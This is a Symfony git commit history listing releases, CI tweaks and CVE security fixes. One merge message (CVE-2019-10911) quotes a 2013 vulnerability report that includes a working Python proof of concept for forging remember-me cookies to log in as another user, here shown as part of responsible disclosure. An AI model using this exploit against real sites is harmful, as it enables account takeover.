Commit Graph

25783 Commits

Author SHA1 Message Date
Fabien Potencier 4d0899c5e3 bumped version 2019-04-17 18:37:53 +02:00
Fabien Potencier 649bb0095f fixed version 2019-04-17 18:37:23 +02:00
Fabien Potencier 20f9c87a12
Merge pull request #31144 from fabpot/release-2.7.51
released v2.7.51
2019-04-17 17:44:35 +02:00
Fabien Potencier 2636414523 updated VERSION for 2.7.51 2019-04-17 17:43:55 +02:00
Fabien Potencier 343865d847 updated CHANGELOG for 2.7.51 2019-04-17 17:34:40 +02:00
Nicolas Grekas 789a34ad76 security #cve-2019-10910 [DI] Check service IDs are valid (nicolas-grekas)
This PR was merged into the 2.7 branch.

Discussion
----------

[DI] Check service IDs are valid

Based on #87

Commits
-------

0671884f41 [DI] Check service IDs are valid
2019-04-16 13:06:12 +02:00
Nicolas Grekas 783ef2fb1d security #cve-2019-10909 [FrameworkBundle][Form] Fix XSS issues in the form theme of the PHP templating engine - CVE-2019-10909 (stof)
This PR was merged into the 2.7 branch.

Discussion
----------

[FrameworkBundle][Form] Fix XSS issues in the form theme of the PHP templating engine - CVE-2019-10909

https://www.intigriti.com/researcher/submission/CfDJ8Pja6NZvkpNCmx5vVyiGSn4K0Hgfyo6ynNDaSmw63JqRiMJ1Arv1xOxeLFRsv7xVI0MAspfOj8pKsT-ruB6Pfx5HvSOKt0UzPUqqpEWtGNo2kb3xuLP19uhpuMvrZOXnDA

![image](https://user-images.githubusercontent.com/211740/55671589-dc3d0700-5891-11e9-8420-2ab8961c69db.png)

Commits
-------

e645e2aa7e Fix XSS issues in the form theme of the PHP templating engine
2019-04-16 11:58:49 +02:00
Nicolas Grekas 2681a5f4ba security #cve-2019-10911 [Security] Add a separator in the remember me cookie hash (pborreli)
This PR was merged into the 2.7 branch.

Discussion
----------

[Security] Add a separator in the remember me cookie hash

Fabien found this issue reported back in 2013 but it was never resolved. Pascal (@pborreli) did the original patch.

```
> -------- Original Message --------
> Subject: No structure in remember me MAC
> Date: Tue, 4 Jun 2013 09:46:21 +0100
> From: Jon Cave <jon@joncave.co.uk>
> To: security@symfony.com
>
> I have discovered a vulnerability in the Symfony framework that
> affects version 2.3 and all other 2.x releases. The vulnerability
> would allow an attacker to authenticate as a privileged user on sites
> with user registration and remember me login functionality enabled.
>
> The problem is that there is no structure in the data that is passed
> to the hash function when generating a MAC for remember me cookies.
> From
> Symfony\Component\Security\Http\RememberMe\TokenBasedRememberMeServices::generateCookieHash():
>
>   return hash('sha256',
> $class.$username.$expires.$password.$this->getKey());
>
> This means that there are many inputs that result in the same hash.
> For example, a user can register with username "admin9" and receive
> the following cookie: "<class>:admin9:1370334467:<hash>" where <hash>
> is hash('sha256', "<class>admin91370334467<password><key>"). This
> cookie can then be modified to be: "<class>:admin:91370334467:<hash>"
> where <hash> is the same value as before. The application will load
> the "admin" user and recognise the provided hash as valid! (NB: I left
> out some base64 encoding to make things more obvious.)
>
> The solution to this is to use the same separator when generating the
> hash as is done when encoding the cookie, e.g.:
>
>   return hash('sha256', $class . ':' . $username . ':' . $expires .
> ':' . $password . ':' . $this->getKey());
>
> It would also be a good idea to switch to using hash_hmac():
>
>   return hash_hmac('sha256', $class . ':' . $username . ':' . $expires
> . ':' . $password, $this->getKey());
>
> This is because HMAC is a stronger MAC construction than the secret
> suffix one currently being used [1].
>
> Let me know if you have any questions.
>
> Cheers,
> Jon
> http://joncave.co.uk/
> @joncave
>
> [1]
> http://rdist.root.org/2009/10/29/stop-using-unsafe-keyed-hashes-use-hmac/
>
> Proof of concept code to perform the attack given a valid cookie to modify:
>
> import base64
> import requests
> import sys
>
> if __name__ == "__main__":
>     if len(sys.argv) != 3:
>         print "COOKIE URL"
>         sys.exit(1)
>
>     cookie = sys.argv[1] # Current cookie
>     url = sys.argv[2]    # URL
>
>     cls, name, expires, mac = base64.b64decode(cookie).split(":")
>
>     # Tamper
>     name = base64.b64decode(name)
>     expires = name[-1] + expires
>     name = base64.b64encode(name[:-1])
>
>     # Reconstruct
>     cookie = ":".join([cls, name, expires, mac])
>
>     print "Using cookie: " + cookie
>     print
>
>     cookies = {"REMEMBERME": base64.b64encode(cookie)}
>     print requests.get(url, cookies=cookies).text
>
>
```

Commits
-------

6356982017 [Security] Add a separator in the remember me cookie hash
2019-04-16 11:58:36 +02:00
Nicolas Grekas 722efa1f17 security #cve-2019-10913 [HttpFoundation] reject invalid method override (nicolas-grekas)
This PR was merged into the 2.7 branch.

Discussion
----------

[HttpFoundation] reject invalid method override

| Q             | A
| ------------- | ---
| Branch?       | 3.4
| Bug fix?      | yes
| New feature?  | no
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | -
| License       | MIT
| Doc PR        | -

From https://www.intigriti.com/company/submission/CfDJ8Pja6NZvkpNCmx5vVyiGSn7LV-k0ZJ4JlDGSPAaBG1sG1aNinWbVYRos8ldmLPCMSPdHLrwLufz8lXoJ-UNS3XW1_Xkxc7u9rIaENVJ_-nQV_uic7D1tmRhB6PFiBkRgBA

About `Request::getMethod`:

> There will be developers, who expect the http method to be valid and therefore will use the return value unescaped in sql, html or other dangerous places.

this is what this PR improves, forcing only ASCII letters in overridden methods.

> It is possible to set the header to "GET", "HEAD", "OPTIONS" and "TRACE". Because of this, the method Request::isMethodSafe() returns true, although the actual http method is post.

I don't think this creates any issue: not fixed.

> Normally, if you try to provide a request body in a GET-Request, the web server discards the request body. This security functionality can be completely bypassed through this. [...] Recommendation: Remove the parsed body params from the request object, if a method without a body is set.

I don't think this is valid: actually we *do* populate `$request->request` with the body of GET requests when some is sent.

> Even if very rare, some users still use old browsers, where CORS is not available. Or a server admin allowed headers to be cross origin. In those cases this functionality enables CSRF-Attackes, if the developers trusts the http method. (E.g. Shopware does this).

I don't understand this, not addressed.

ping @michaelcullum if you want to answer the person.
And other to review :)

Commits
-------

6ce9991392 [HttpFoundation] reject invalid method override
2019-04-16 11:58:21 +02:00
Fabien Potencier 0848ce2c7f
Merge pull request #29486 from fabpot/release-2.7.50
released v2.7.50
2018-12-06 14:40:04 +00:00
Fabien Potencier 95222d6f80 bumped version 2018-12-06 14:39:39 +00:00
Fabien Potencier 161aa25779 updated CHANGELOG for 2.7.50 2018-12-06 14:38:57 +00:00
Nicolas Grekas 9b10db2207 fix CI 2018-12-06 11:49:24 +00:00
Nicolas Grekas f27dd4b5be security #cve-2018-19790 [Security\Http] detect bad redirect targets using backslashes (xabbuh)
This PR was merged into the 2.7 branch.

Discussion
----------

[Security\Http] detect bad redirect targets using backslashes

| Q             | A
| ------------- | ---
| Branch?       | 2.7
| Bug fix?      | yes
| New feature?  | no
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | #76
| License       | MIT
| Doc PR        |

Commits
-------

99a0cec0a6 [Security\Http] detect bad redirect targets using backslashes
2018-12-06 11:09:35 +00:00
Nicolas Grekas b65e6f1a47 security #cve-2018-19789 [Form] Filter file uploads out of regular form types (nicolas-grekas)
This PR was merged into the 2.7 branch.

Discussion
----------

[Form] Filter file uploads out of regular form types

| Q             | A
| ------------- | ---
| Branch?       | 2.7
| Bug fix?      | yes
| New feature?  | no
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | -
| License       | MIT
| Doc PR        | -

This PR filters uploaded files out of the data processed by any form type except `FileType`.

Commits
-------

205a44ea7d [Form] Filter file uploads out of regular form types
2018-12-06 11:08:15 +00:00
Christian Flothmann 99a0cec0a6 [Security\Http] detect bad redirect targets using backslashes 2018-11-29 16:25:45 +01:00
Nicolas Grekas 205a44ea7d [Form] Filter file uploads out of regular form types 2018-11-29 16:24:44 +01:00
Nicolas Grekas cb8302cb76 Fix CI 2018-11-29 16:06:32 +01:00
Nicolas Grekas c40cf26c5f minor #28258 [travis] fix composer.lock invalidation for deps=low (nicolas-grekas)
This PR was merged into the 2.8 branch.

Discussion
----------

[travis] fix composer.lock invalidation for deps=low

| Q             | A
| ------------- | ---
| Branch?       | 2.8
| Bug fix?      | no
| New feature?  | no
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | -
| License       | MIT
| Doc PR        | -

Commits
-------

41ffba1916 [travis] fix composer.lock invalidation for deps=low
2018-08-24 14:41:13 +02:00
Nicolas Grekas 74aef7a3ec [travis] fix composer.lock invalidation for PRs patching several components 2018-08-19 14:57:53 +02:00
Nicolas Grekas caf69aa3c4 [travis] fix composer.lock invalidation for deps=low 2018-08-19 11:09:49 +02:00
Fabien Potencier e61cb8e14a minor #28199 [travis][appveyor] use symfony/flex to accelerate builds (nicolas-grekas)
This PR was merged into the 2.8 branch.

Discussion
----------

[travis][appveyor] use symfony/flex to accelerate builds

| Q             | A
| ------------- | ---
| Branch?       | 2.8
| Bug fix?      | no
| New feature?  | no
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | -
| License       | MIT
| Doc PR        | -

Playing with https://github.com/symfony/flex/pull/409

The optimization is required because appveyor is transiently failing with OOM errors, see e.g.
https://ci.appveyor.com/project/fabpot/symfony/build/1.0.39377

Commits
-------

940ec8f2d5 [travis][appveyor] use symfony/flex to accelerate builds
2018-08-18 18:48:18 +02:00
Nicolas Grekas 80980330db [travis] ignore ordering when validating composer.lock files for deps=low 2018-08-07 17:20:51 +02:00
Nicolas Grekas 4b13fc5d9e minor #28146 [travis] cache composer.lock files for deps=low (nicolas-grekas)
This PR was merged into the 2.8 branch.

Discussion
----------

[travis] cache composer.lock files for deps=low

| Q             | A
| ------------- | ---
| Branch?       | 2.8
| Bug fix?      | no
| New feature?  | no
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | -
| License       | MIT
| Doc PR        | -

I just realized that the resolved package versions for lowest deps depends only on the root composer.json, and not on transitive deps.
This means we can cache the lock files and save ~10 minutes required to resolve the lowest deps of the SecurityBundle.

Commits
-------

caaa74cd9b [travis] cache composer.lock files for deps=low
2018-08-07 11:35:46 +02:00
Nicolas Grekas 79ce6eae8f fix ci 2018-08-03 15:16:18 +02:00
Nicolas Grekas fa4d95a3ba [travis] fix requiring mongodb/mongodb before composer up 2018-08-03 14:54:05 +02:00
Nicolas Grekas 548e9f71b7 minor #28114 [travis] merge "same Symfony version" jobs in one (nicolas-grekas)
This PR was merged into the 2.8 branch.

Discussion
----------

[travis] merge "same Symfony version" jobs in one

| Q             | A
| ------------- | ---
| Branch?       | 2.8
| Bug fix?      | no
| New feature?  |
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | -
| License       | MIT
| Doc PR        | -

Allowing to consume fewer jobs and save the 1 to 2 minutes bootstrap time of workers.

Commits
-------

9857ca07aa [travis] merge "same Symfony version" jobs in one
2018-08-03 13:24:48 +02:00
Fabien Potencier 79e3904031 minor #28110 [2.7] Make CI green (nicolas-grekas)
This PR was merged into the 2.7 branch.

Discussion
----------

[2.7] Make CI green

| Q             | A
| ------------- | ---
| Branch?       | 2.7
| Bug fix?      | no
| New feature?  | no
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | -
| License       | MIT
| Doc PR        | -

2.7 still receives security fixes for a few more months, let's keep its CI green.

Commits
-------

ced4201b43 [2.7] Make CI green
2018-08-02 11:14:02 +02:00
Nicolas Grekas ced4201b43 [2.7] Make CI green 2018-08-02 08:59:56 +02:00
Fabien Potencier 3425d87198
Merge pull request #28098 from fabpot/release-2.7.49
released v2.7.49
2018-08-01 15:57:05 +02:00
Fabien Potencier 62184c0a33 updated VERSION for 2.7.49 2018-08-01 15:56:47 +02:00
Fabien Potencier 5999020906 updated CHANGELOG for 2.7.49 2018-08-01 15:51:13 +02:00
Nicolas Grekas 9cfcaba0bf security #cve-2018-14774 [HttpKernel] fix trusted headers management in HttpCache and InlineFragmentRenderer (nicolas-grekas)
* commit '08a32d44b6':
  [HttpKernel] fix trusted headers management in HttpCache and InlineFragmentRenderer
2018-08-01 14:45:04 +02:00
Nicolas Grekas 08a32d44b6 [HttpKernel] fix trusted headers management in HttpCache and InlineFragmentRenderer 2018-08-01 14:44:26 +02:00
Nicolas Grekas efcde3d068 security #cve-2018-14773 [HttpFoundation] Remove support for legacy and risky HTTP headers (nicolas-grekas)
This PR was merged into the 2.7 branch.

Discussion
----------

[2.7][HttpFoundation] Remove support for legacy and risky HTTP headers

Commits
-------

eda2b20df5 [HttpFoundation] Remove support for legacy and risky HTTP headers
2018-08-01 10:43:33 +02:00
Nicolas Grekas eda2b20df5 [HttpFoundation] Remove support for legacy and risky HTTP headers 2018-07-31 21:55:31 +02:00
Fabien Potencier 34d6116e2b
Merge pull request #27374 from fabpot/release-2.7.48
released v2.7.48
2018-05-25 13:46:22 +02:00
Fabien Potencier 81564555d8 updated VERSION for 2.7.48 2018-05-25 13:45:58 +02:00
Fabien Potencier fb79294e76 update CONTRIBUTORS for 2.7.48 2018-05-25 13:45:39 +02:00
Fabien Potencier 548f1cbf73 updated CHANGELOG for 2.7.48 2018-05-25 13:45:30 +02:00
Fabien Potencier ab32125187 bug #27359 [HttpFoundation] Fix perf issue during MimeTypeGuesser intialization (nicolas-grekas)
This PR was merged into the 2.7 branch.

Discussion
----------

[HttpFoundation] Fix perf issue during MimeTypeGuesser intialization

| Q             | A
| ------------- | ---
| Branch?       | 2.7
| Bug fix?      | yes
| New feature?  | no
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | #27307
| License       | MIT
| Doc PR        | -

introduced in #26886

![image](https://user-images.githubusercontent.com/243674/40451947-918f5358-5ee0-11e8-9f1a-cf707bf3cefa.png)

Commits
-------

f8e7a18d1b [HttpFoundation] Fix perf issue during MimeTypeGuesser intialization
2018-05-25 12:53:06 +02:00
Fabien Potencier 2f34263a1a fixed constraints 2018-05-25 08:35:17 +02:00
Fabien Potencier 1151ab28c0 bumped dep 2018-05-25 08:20:37 +02:00
Fabien Potencier 87153549f6 bumped dep 2018-05-25 07:45:02 +02:00
Fabien Potencier b20e83562e security #cve-2018-11408 [SecurityBundle] Fail if security.http_utils cannot be configured
* cve-2018-11408-2.7:
  [SecurityBundle] Fail if security.http_utils cannot be configured
2018-05-24 15:22:46 +02:00
Nicolas Grekas c003b7a247 [SecurityBundle] Fail if security.http_utils cannot be configured 2018-05-24 15:22:37 +02:00
Fabien Potencier 319e1bdd43 security #cve-2018-11406 clear CSRF tokens when the user is logged out
* cve-2018-11406-2.7:
  clear CSRF tokens when the user is logged out
2018-05-24 14:39:56 +02:00
Christian Flothmann 4b91c171af clear CSRF tokens when the user is logged out 2018-05-24 14:39:52 +02:00
Nicolas Grekas f8e7a18d1b [HttpFoundation] Fix perf issue during MimeTypeGuesser intialization 2018-05-23 23:23:26 +02:00
Fabien Potencier fa5bf4b17d security #cve-2018-11385 Adding session strategy to ALL listeners to avoid *any* possible fixation
* cve-2018-11385-2.7:
  Adding session strategy to ALL listeners to avoid *any* possible fixation
2018-05-23 15:50:13 +02:00